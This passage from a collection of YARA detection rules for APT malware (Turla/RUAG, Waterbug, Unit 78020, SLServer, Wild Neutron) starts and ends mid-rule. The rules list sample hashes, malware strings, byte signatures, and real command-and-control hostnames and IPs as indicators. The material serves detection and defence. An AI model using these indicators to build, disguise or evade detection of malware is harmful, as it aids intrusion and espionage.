"http://*:80/W3SVC/" wide $s2 = "https://*:443/W3SVC/" wide $s3 = "neuron2.exe" ascii $s4 = "D:\\Develop\\sps\\neuron2\\neuron2\\obj\\Release\\neuron2.pdb" ascii condition: (uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550) and $dotnetMagic and 2 of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule Turla_APT_srsvc { meta: description = "Detects Turla malware (based on sample used in the RUAG APT case)" author = "Florian Roth" family = "Turla" reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" date = "2016-06-09" hash1 = "65996f266166dbb479a42a15a236e6564f0b322d5d68ee546244d7740a21b8f7" hash2 = "25c7ff1eb16984a741948f2ec675ab122869b6edea3691b01d69842a53aa3bac" strings: $x1 = "SVCHostServiceDll.dll" fullword ascii $s2 = "msimghlp.dll" fullword wide $s3 = "srservice" fullword wide $s4 = "ModStart" fullword ascii $s5 = "ModStop" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 20KB and ( 1 of ($x*) or all of ($s*) ) ) or ( all of them ) } rule Turla_APT_Malware_Gen1 { meta: description = "Detects Turla malware (based on sample used in the RUAG APT case)" author = "Florian Roth" family = "Turla" reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" date = "2016-06-09" hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4" hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9" hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd" hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4" hash5 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4" hash6 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348" hash7 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a" hash8 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98" hash9 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f" hash10 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2" strings: $x1 = "too long data for this type of transport" fullword ascii $x2 = "not enough server resources to complete operation" fullword ascii $x3 = "Task not execute. Arg file failed." fullword ascii $x4 = "Global\\MSCTF.Shared.MUTEX.ZRX" fullword ascii $s1 = "peer has closed the connection" fullword ascii $s2 = "tcpdump.exe" fullword ascii $s3 = "windump.exe" fullword ascii $s4 = "dsniff.exe" fullword ascii $s5 = "wireshark.exe" fullword ascii $s6 = "ethereal.exe" fullword ascii $s7 = "snoop.exe" fullword ascii $s8 = "ettercap.exe" fullword ascii $s9 = "miniport.dat" fullword ascii $s10 = "net_password=%s" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 2 of ($x*) or 8 of ($s*) ) ) or ( 12 of them ) } rule Turla_APT_Malware_Gen2 { meta: description = "Detects Turla malware (based on sample used in the RUAG APT case)" author = "Florian Roth" family = "Turla" reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" date = "2016-06-09" hash1 = "0e1bf347c37fb199886f1e675e372ba55ac4627e8be2f05a76c2c64f9b6ed0e4" hash2 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9" hash3 = "fe3ffd7438c0d38484bf02a78a19ea81a6f51b4b3f2b2228bd21974c2538bbcd" hash4 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4" strings: $x1 = "Internal command not support =((" fullword ascii $x2 = "L|-1|AS_CUR_USER:OpenProcessToken():%d, %s|" fullword ascii $x3 = "L|-1|CreateProcessAsUser():%d, %s|" fullword ascii $x4 = "AS_CUR_USER:OpenProcessToken():%d" fullword ascii $x5 = "L|-1|AS_CUR_USER:LogonUser():%d, %s|" fullword ascii $x6 = "L|-1|try to run dll %s with user priv|" fullword ascii $x7 = "\\\\.\\Global\\PIPE\\sdlrpc" fullword ascii $x8 = "\\\\%s\\pipe\\comnode" fullword ascii $x9 = "Plugin dll stop failed." fullword ascii $x10 = "AS_USER:LogonUser():%d" fullword ascii $s1 = "MSIMGHLP.DLL" fullword wide $s2 = "msimghlp.dll" fullword ascii $s3 = "ximarsh.dll" fullword ascii $s4 = "msximl.dll" fullword ascii $s5 = "INTERNAL.dll" fullword ascii $s6 = "\\\\.\\Global\\PIPE\\" fullword ascii $s7 = "ieuser.exe" fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 5 of ($s*) ) ) or ( 10 of them ) } rule Turla_APT_Malware_Gen3 { meta: description = "Detects Turla malware (based on sample used in the RUAG APT case)" author = "Florian Roth" family = "Turla" reference = "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case" date = "2016-06-09" hash1 = "c49111af049dd9746c6b1980db6e150b2a79ca1569b23ed2cba81c85c00d82b4" hash2 = "b62a643c96e2e41f639d2a8ce11d61e6b9d7fb3a9baf011120b7fec1b4ee3cf4" hash3 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348" hash4 = "8f2ea0f916fda1dfb771f5441e919c561da5b6334b9f2fffcbf53db14063b24a" hash5 = "8dddc744bbfcf215346c812aa569e49523996f73a1f22fe4e688084ce1225b98" hash6 = "0c69258adcc97632b729e55664c22cd942812336d41e8ea0cff9ddcafaded20f" hash7 = "2b4fba1ef06f85d1395945db40a9f2c3b3ed81b56fb9c2d5e5bb693c230215e2" hash8 = "7206075cd8f1004e8f1f759d46e98bfad4098b8642412811a214c0155a1f08b9" hash9 = "edb12790b5cd959bc2e53a4b369a4fd747153e6c9d50f6a69ff047f7857a4348" strings: $x1 = "\\\\.\\pipe\\sdlrpc" fullword ascii $x2 = "WaitMutex Abandoned %p" fullword ascii $x3 = "OPER|Wrong config: no port|" fullword ascii $x4 = "OPER|Wrong config: no lastconnect|" fullword ascii $x5 = "OPER|Wrong config: empty address|" fullword ascii $x6 = "Trans task %d obj %s ACTIVE fail robj %s" fullword ascii $x7 = "OPER|Wrong config: no auth|" fullword ascii $x8 = "OPER|Sniffer '%s' running... ooopppsss...|" fullword ascii $s1 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Post Platform" fullword ascii $s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\User Agent\\Pre Platform" fullword ascii $s3 = "www.yahoo.com" fullword ascii $s4 = "MSXIML.DLL" fullword wide $s5 = "www.bing.com" fullword ascii $s6 = "%s: http://%s%s" fullword ascii $s7 = "/javascript/view.php" fullword ascii $s8 = "Task %d failed %s,%d" fullword ascii $s9 = "Mozilla/4.0 (compatible; MSIE %d.0; " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) or 6 of ($s*) ) ) or ( 10 of them ) } /* Yara Rule Set Author: Florian Roth Date: 2016-05-23 Identifier: Swiss RUAG APT Case Reference: https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case */ rule RUAG_Tavdig_Malformed_Executable { meta: description = "Detects an embedded executable with a malformed header - known from Tavdig malware" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 condition: /* MZ Header and malformed PE header > 0x0bad */ uint16(0) == 0x5a4d and uint32(uint32(0x3C)) == 0x0000AD0B } rule RUAG_Bot_Config_File { meta: description = "Detects a specific config file used by malware in RUAG APT case" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 strings: $s1 = "[CONFIG]" ascii $s2 = "name = " ascii $s3 = "exe = cmd.exe" ascii condition: $s1 at 0 and $s2 and $s3 and filesize < 160 } rule RUAG_Cobra_Malware { meta: description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 strings: $s1 = "\\Cobra\\Release\\Cobra.pdb" ascii condition: uint16(0) == 0x5a4d and $s1 } rule RUAG_Cobra_Config_File { meta: description = "Detects a config text file used by malware Cobra in RUAG case" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 strings: $h1 = "[NAME]" ascii $s1 = "object_id=" ascii $s2 = "[TIME]" ascii fullword $s3 = "lastconnect" ascii $s4 = "[CW_LOCAL]" ascii fullword $s5 = "system_pipe" ascii $s6 = "user_pipe" ascii $s7 = "[TRANSPORT]" ascii $s8 = "run_task_system" ascii $s9 = "[WORKDATA]" ascii $s10 = "address1" ascii condition: $h1 at 0 and 8 of ($s*) and filesize < 5KB } rule RUAG_Exfil_Config_File { meta: description = "Detects a config text file used in data exfiltration in RUAG case" author = "Florian Roth" reference = "https://goo.gl/N5MEj0" score = 60 strings: $h1 = "[TRANSPORT]" ascii $s1 = "system_pipe" ascii $s2 = "spstatus" ascii $s3 = "adaptable" ascii $s4 = "post_frag" ascii $s5 = "pfsgrowperiod" ascii condition: $h1 at 0 and all of ($s*) and filesize < 1KB } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule WaterBug_turla_dll { meta: description = "Symantec Waterbug Attack - Trojan Turla DLL" author = "Symantec Security Response" date = "22.01.2015" reference = "http://www.symantec.com/connect/blogs/turla-spying-tool-targets-governments-and-diplomats" strings: $a = /([A-Za-z0-9]{2,10}_){,2}Win32\.dll\x00/ condition: pe.exports("ee") and $a } rule turla_dropper { meta: maltype = "turla dropper" ref = "https://github.com/reed1713" reference = "http://info.baesystemsdetica.com/rs/baesystems/images/snake_whitepaper.pdf" date = "3/13/2014" description = "This sample was pulled from the bae systems snake campaign report. The Turla dropper creates a file in teh temp dir and registers an auto start service call \"RPC Endpoint Locator\"." strings: $type="Microsoft-Windows-Security-Auditing" $eventid="4688" $data="AppData\\Local\\Temp\\rsys.exe" $type1="Service Control Manager" $eventid1="7036" $data1="RPC Endpoint Locator" $data2="running" $type2="Service Control Manager" $eventid2="7045" $data3="RPC Endpoint Locator" $data4="user mode service" $data5="auto start" condition: ($type and $eventid and $data) or ($type1 and $eventid1 and $data1 and $data2 and $type2 and $eventid2 and $data3 and $data4 and $data5) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule dubseven_file_set { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for service files loading UP007" strings: $file1 = "\\Microsoft\\Internet Explorer\\conhost.exe" $file2 = "\\Microsoft\\Internet Explorer\\dll2.xor" $file3 = "\\Microsoft\\Internet Explorer\\HOOK.DLL" $file4 = "\\Microsoft\\Internet Explorer\\main.dll" $file5 = "\\Microsoft\\Internet Explorer\\nvsvc.exe" $file6 = "\\Microsoft\\Internet Explorer\\SBieDll.dll" $file7 = "\\Microsoft\\Internet Explorer\\mon" $file8 = "\\Microsoft\\Internet Explorer\\runas.exe" condition: //MZ header //PE signature //Just a few of these as they differ uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 3 of ($file*) } rule dubseven_dropper_registry_checks { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for registry keys checked for by the dropper" strings: $reg1 = "SOFTWARE\\360Safe\\Liveup" $reg2 = "Software\\360safe" $reg3 = "SOFTWARE\\kingsoft\\Antivirus" $reg4 = "SOFTWARE\\Avira\\Avira Destop" $reg5 = "SOFTWARE\\rising\\RAV" $reg6 = "SOFTWARE\\JiangMin" $reg7 = "SOFTWARE\\Micropoint\\Anti-Attack" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and all of ($reg*) } rule dubseven_dropper_dialog_remains { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for related dialog remnants. How rude." strings: $dia1 = "fuckMessageBox 1.0" wide $dia2 = "Rundll 1.0" wide condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and any of them } rule maindll_mutex { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Matches on the maindll mutex" ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $mutex = "h31415927tttt" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $mutex } rule SLServer_dialog_remains { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for related dialog remnants." ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $slserver = "SLServer" wide condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $slserver } rule SLServer_mutex { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for the mutex." ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $mutex = "M&GX^DSF&DA@F" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $mutex } rule SLServer_command_and_control { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for the C2 server." ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $c2 = "safetyssl.security-centers.com" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $c2 } rule SLServer_campaign_code { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for the related campaign code." ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $campaign = "wthkdoc0106" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $campaign } rule SLServer_unknown_string { meta: author = "Matt Brooks, @cmatthewbrooks" desc = "Searches for a unique string." ref = "https://citizenlab.org/2016/04/between-hong-kong-and-burma/" strings: $string = "test-b7fa835a39" condition: //MZ header //PE signature uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $string } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ /* Yara Rule Set Author: Florian Roth Date: 2015-09-24 Identifier: Unit 78020 Malware */ rule Unit78020_Malware_Gen1 { meta: description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule" author = "Florian Roth" reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy" date = "2015-09-24" hash1 = "2b15e614fb54bca7031f64ab6caa1f77b4c07dac186826a6cd2e254090675d72" hash2 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd" hash3 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac" hash4 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2" hash5 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af" hash6 = "88c5be84afe20c91e4024160303bafb044f98aa5fbf8c9f9997758a014238790" strings: $x1 = "greensky27.vicp.net" fullword wide $x2 = "POST http://%s:%d/aspxabcdefg.asp?%s HTTP/1.1" fullword ascii $x3 = "GET http://%s:%d/aspxabcdef.asp?%s HTTP/1.1" fullword ascii /* additional strings based on PDF report - not found in samples */ $x4 = "serch.vicp.net" fullword wide $x5 = "greensky27.vicp.net" fullword wide $x6 = "greensky27.vicp.net.as" fullword wide $x7 = "greensky27.vcip.net" fullword wide $x8 = "pnoc-ec.vicp.net" fullword wide $x9 = "aseanph.vicp.net" fullword wide $x10 = "pnoc.vicp.net" fullword wide $a1 = "dMozilla/4.0 (compatible; MSIE 6.0;Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide /* typo */ $a2 = "User-Agent: Netscape" fullword ascii /* ;) */ $a3 = "Accept-Language:En-us/r/n" fullword wide /* typo */ $a4 = "\\Office Start.lnk" fullword wide $a5 = "\\MSN Talk Start.lnk" fullword wide $s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)" fullword wide $s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii $s3 = "%USERPROFILE%\\Application Data\\Mozilla\\Firefox\\Profiles" fullword wide $s4 = "Content-Type:application/x-www-form-urlencoded/r/n" fullword wide $s5 = "Hello World!" fullword wide $s6 = "Accept-Encoding:gzip,deflate/r/n" fullword wide $s7 = "/%d%s%d" fullword ascii $s8 = "%02d-%02d-%02d %02d:%02d" fullword wide $s9 = "WininetMM Version 1.0" fullword wide $s10 = "WININETMM" fullword wide $s11 = "GET %dHTTP/1.1" fullword ascii $s12 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii $s13 = "PeekNamePipe" fullword ascii $s14 = "Normal.dot" fullword ascii $s15 = "R_eOR_eOR_eO)CiOS_eO" fullword ascii $s16 = "DRIVE_RAMDISK" fullword wide $s17 = "%s %s %s %s %d %d %d %d " fullword ascii condition: ( uint16(0) == 0x5a4d and filesize < 250KB and 1 of ($x*) ) or 2 of ($a*) or 6 of ($s*) } rule Unit78020_Malware_1 { meta: description = "Detects malware by Chinese APT PLA Unit 78020 - Specific Rule - msictl.exe" author = "Florian Roth" reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy" date = "2015-09-24" hash = "a93d01f1cc2d18ced2f3b2b78319aadc112f611ab8911ae9e55e13557c1c791a" strings: $s1 = "%ProgramFiles%\\Internet Explorer\\iexplore.exe" fullword ascii $s2 = "msictl.exe" fullword ascii $s3 = "127.0.0.1:8080" fullword ascii $s4 = "mshtml.dat" fullword ascii $s5 = "msisvc" fullword ascii $s6 = "NOKIAN95/WEB" fullword ascii condition: uint16(0) == 0x5a4d and filesize < 160KB and 4 of them } rule Unit78020_Malware_Gen2 { meta: description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule" author = "Florian Roth" reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy" date = "2015-09-24" super_rule = 1 hash1 = "76c586e89c30a97e583c40ebe3f4ba75d5e02e52959184c4ce0a46b3aac54edd" hash2 = "7b73bf2d80a03eb477242967628da79924fbe06cc67c4dcdd2bdefccd6e0e1af" hash3 = "981e2fa1ae4145359036b46e8b53cc5da37dd2311204859761bd91572f025e8a" strings: $s0 = "-GetModuleFileNameExW" fullword ascii $s1 = "\\MSN Talk Start.lnk" fullword wide $s2 = ":SeDebugPrivilege" fullword wide $s3 = "WinMM Version 1.0" fullword wide $s4 = "dwError1 = %d" fullword ascii $s5 = "*Can't Get" fullword wide condition: uint16(0) == 0x5a4d and filesize < 1000KB and all of them } rule Unit78020_Malware_Gen3 { meta: description = "Detects malware by Chinese APT PLA Unit 78020 - Generic Rule - Chong" author = "Florian Roth" reference = "http://threatconnect.com/camerashy/?utm_campaign=CameraShy" date = "2015-09-24" super_rule = 1 hash1 = "2625a0d91d3cdbbc7c4a450c91e028e3609ff96c4f2a5a310ae20f73e1bc32ac" hash2 = "5c62b1d16e6180f22a0cb59c99a7743f44cb4a41e4e090b9733d1fb687c8efa2" strings: $x1 = "GET http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii $x2 = "POST http://%ws:%d/%d%s%dHTTP/1.1" fullword ascii $x3 = "J:\\chong\\" ascii $s1 = "User-Agent: Netscape" fullword ascii $s2 = "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-EN; rv:1.7.12) Gecko/20100719 Firefox/1.0.7" fullword ascii $s3 = "Software\\Microsoft\\Windows\\CurrentVersion\\explorer\\User Shell Folders" fullword wide $s4 = "J:\\chong\\nod\\Release\\SslMM.exe" fullword ascii $s5 = "MM.exe" fullword ascii $s6 = "network.proxy.ssl" fullword wide $s7 = "PeekNamePipe" fullword ascii $s8 = "Host: %ws:%d" fullword ascii $s9 = "GET %dHTTP/1.1" fullword ascii $s10 = "SCHANNEL.DLL" fullword ascii /* Goodware String - occured 6 times */ condition: ( uint16(0) == 0x5a4d and filesize < 300KB and 1 of ($x*) ) or 4 of ($s*) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ import "pe" rule WaterBug_wipbot_2013_core_PDF { meta: description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 core PDF" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $PDF = "%PDF-" $a = /\+[A-Za-z]{1}\. _ _ \$\+[A-Za-z]{1}\. _ \$ _ \+/ $b = /\+[A-Za-z]{1}\.\$\$\$ _ \+/ condition: ($PDF at 0) and #a > 150 and #b > 200 } rule WaterBug_wipbot_2013_dll { meta: description = "Symantec Waterbug Attack - Trojan.Wipbot 2014 Down.dll component" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $string1 = "/%s?rank=%s" $string2 = "ModuleStart\x00ModuleStop\x00start" $string3 = "1156fd22-3443-4344-c4ffff" //read file... error.. $string4 = "read\x20file\x2E\x2E\x2E\x20error\x00\x00" condition: 2 of them } rule WaterBug_wipbot_2013_core { meta: description = "Symantec Waterbug Attack - Trojan.Wipbot core + core; garbage appended data (PDF Exploit leftovers) + wipbot dropper; fake AdobeRd32 Error" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $mz = "MZ" $code1 = { 89 47 0C C7 47 10 90 C2 04 00 C7 47 14 90 C2 10 00 C7 47 18 90 90 60 68 89 4F 1C C7 47 20 90 90 90 B8 89 4F 24 C7 47 28 90 FF D0 61 C7 47 2C 90 C2 04 00} $code2 = { 85 C0 75 25 8B 0B BF ?? ?? ?? ?? EB 17 69 D7 0D 66 19 00 8D BA 5F F3 6E 3C 89 FE C1 EE 10 89 F2 30 14 01 40 3B 43 04 72 E4} $code3 = {90 90 90 ?? B9 00 4D 5A 90 00 03 00 00 00 82 04} $code4 = {55 89 E5 5D C3 55 89 E5 83 EC 18 8B 45 08 85 C0} condition: $mz at 0 and (($code1 or $code2) or ($code3 and $code4)) } rule WaterBug_turla_dropper { meta: description = "Symantec Waterbug Attack - Trojan Turla Dropper" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $a = {0F 31 14 31 20 31 3C 31 85 31 8C 31 A8 31 B1 31 D1 31 8B 32 91 32 B6 32 C4 32 6C 33 AC 33 10 34} $b = {48 41 4C 2E 64 6C 6C 00 6E 74 64 6C 6C 00 00 00 57 8B F9 8B 0D ?? ?? ?? ?? ?? C9 75 26 56 0F 20 C6 8B C6 25 FF FF FE FF 0F 22 C0 E8} condition: all of them } rule WaterBug_fa_malware { meta: description = "Symantec Waterbug Attack - FA malware variant" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $mz = "MZ" $string1 = "C:\\proj\\drivers\\fa _ 2009\\objfre\\i386\\atmarpd.pdb" $string2 = "d:\\proj\\cn\\fa64\\" $string3 = "sengoku_Win32.sys\x00" $string4 = "rk_ntsystem.c" $string5 = "\\uroboros\\" $string6 = "shell.{F21EDC09-85D3-4eb9-915F-1AFA2FF28153}" condition: ($mz at 0) and (any of ($string*)) } rule WaterBug_sav { meta: description = "Symantec Waterbug Attack - SAV Malware" author = "Symantec Security Response" date = "22.01.2015" reference = "http://t.co/rF35OaAXrl" strings: $mz = "MZ" $code1a = { 8B 75 18 31 34 81 40 3B C2 72 F5 33 F6 39 7D 14 76 1B 8A 04 0E 88 04 0F 6A 0F 33 D2 8B C7 5B F7 F3 85 D2 75 01 } $code1b = { 8B 45 F8 40 89 45 F8 8B 45 10 C1 E8 02 39 45 F8 73 17 8B 45 F8 8B 4D F4 8B 04 81 33 45 20 8B 4D F8 8B 55 F4 89 04 8A EB D7 83 65 F8 00 83 65 EC 00 EB 0E 8B 45 F8 40 89 45 F8 8B 45 EC 40 89 45 EC 8B 45 EC 3B 45 10 73 27 8B 45 F4 03 45 F8 8B 4D F4 03 4D EC 8A 09 88 08 8B 45 F8 33 D2 6A 0F 59 F7 F1 85 D2 75 07 } $code1c = { 8A 04 0F 88 04 0E 6A 0F 33 D2 8B C6 5B F7 F3 85 D2 75 01 47 8B 45 14 46 47 3B F8 72 E3 EB 04 C6 04 08 00 48 3B C6 73 F7 33 C0 C1 EE 02 74 0B 8B 55 18 31 14 81 40 3B C6 72 F5 } $code2 = { 29 5D 0C 8B D1 C1 EA 05 2B CA 8B 55 F4 2B C3 3D 00 00 00 01 89 0F 8B 4D 10 8D 94 91 00 03 00 00 73 17 8B 7D F8 8B 4D 0C 0F B6 3F C1 E1 08 0B CF C1 E0 08 FF 45 F8 89 4D 0C 8B 0A 8B F8 C1 EF 0B} condition: ($mz at 0) and (($code1a or $code1b or $code1c) and $code2) } /* This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license. */ rule WildNeutron_Sample_1 { meta: description = "Wild Neutron APT Sample Rule - file 2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "2b5065a3d0e0b8252a987ef5f29d9e1935c5863f5718b83440e68dc53c21fa94" strings: $s0 = "LiveUpdater.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '25.00' */ $s1 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */ $s2 = "%d -> %d (default)" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s3 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s8 = "id-ce-keyUsage" fullword ascii /* score: '12.00' */ $s9 = "Key Usage" fullword ascii /* score: '12.00' */ $s32 = "UPDATE_ID" fullword wide /* PEStudio Blacklist: strings */ /* score: '9.00' */ $s37 = "id-at-commonName" fullword ascii /* score: '8.00' */ $s38 = "2008R2" fullword wide /* PEStudio Blacklist: os */ /* score: '8.00' */ $s39 = "RSA-alt" fullword ascii /* PEStudio Blacklist: strings */ /* score: '8.00' */ $s40 = "%02d.%04d.%s" fullword wide /* score: '7.02' */ condition: uint16(0) == 0x5a4d and filesize < 800KB and all of them } rule WildNeutron_Sample_2 { meta: description = "Wild Neutron APT Sample Rule - file 8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "8d80f9ef55324212759f4b6070cb8fce18a008ae9dd8b9598553206654d13a6f" strings: $s0 = "rundll32.exe \"%s\",#1" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */ $s1 = "IgfxUpt.exe" fullword wide /* score: '20.00' */ $s2 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */ $s3 = "Intel(R) Common User Interface" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s11 = "Key Usage" fullword ascii /* score: '12.00' */ $s12 = "Intel Integrated Graphics Updater" fullword wide /* PEStudio Blacklist: strings */ /* score: '12.00' */ $s13 = "%sexpires on : %04d-%02d-%02d %02d:%02d:%02d" fullword ascii /* PEStudio Blacklist: strings */ /* score: '11.00' */ condition: uint16(0) == 0x5a4d and filesize < 600KB and all of them } rule WildNeutron_Sample_3 { meta: description = "Wild Neutron APT Sample Rule - file c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "c2c761cde3175f6e40ed934f2e82c76602c81e2128187bab61793ddb3bc686d0" strings: $x1 = "178.162.197.9" fullword ascii /* score: '9.00' */ $x2 = "\"http://fw.ddosprotected.eu:80 /opts resolv=drfx.chickenkiller.com\"" fullword wide /* PEStudio Blacklist: strings */ /* score: '33.00' */ $s1 = "LiveUpdater.exe" fullword wide /* PEStudio Blacklist: strings */ /* score: '25.00' */ $s2 = "id-at-postalAddress" fullword ascii /* PEStudio Blacklist: strings */ /* score: '18.00' */ $s3 = "%d -> %d (default)" fullword wide /* PEStudio Blacklist: strings */ /* score: '17.00' */ $s4 = "%s%s%s=%d,%s=%d,%s=%d," fullword wide /* score: '15.00' */ $s5 = "id-at-serialNumber" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $s6 = "ECDSA with SHA256" fullword ascii /* PEStudio Blacklist: strings */ /* score: '10.00' */ $s7 = "Acer LiveUpdater" fullword wide /* PEStudio Blacklist: strings */ /* score: '10.00' */ condition: uint16(0) == 0x5a4d and filesize < 2020KB and ( 1 of ($x*) or all of ($s*) ) } rule WildNeutron_Sample_4 { meta: description = "Wild Neutron APT Sample Rule - file b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45" author = "Florian Roth" reference = "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" date = "2015-07-10" score = 60 hash = "b4005530193bc523d3e0193c3c53e2737ae3bf9f76d12c827c0b5cd0dcbaae45" strings: $x1 = "WinRAT-Win32-Release.exe" fullword ascii /* score: '22.00' */ 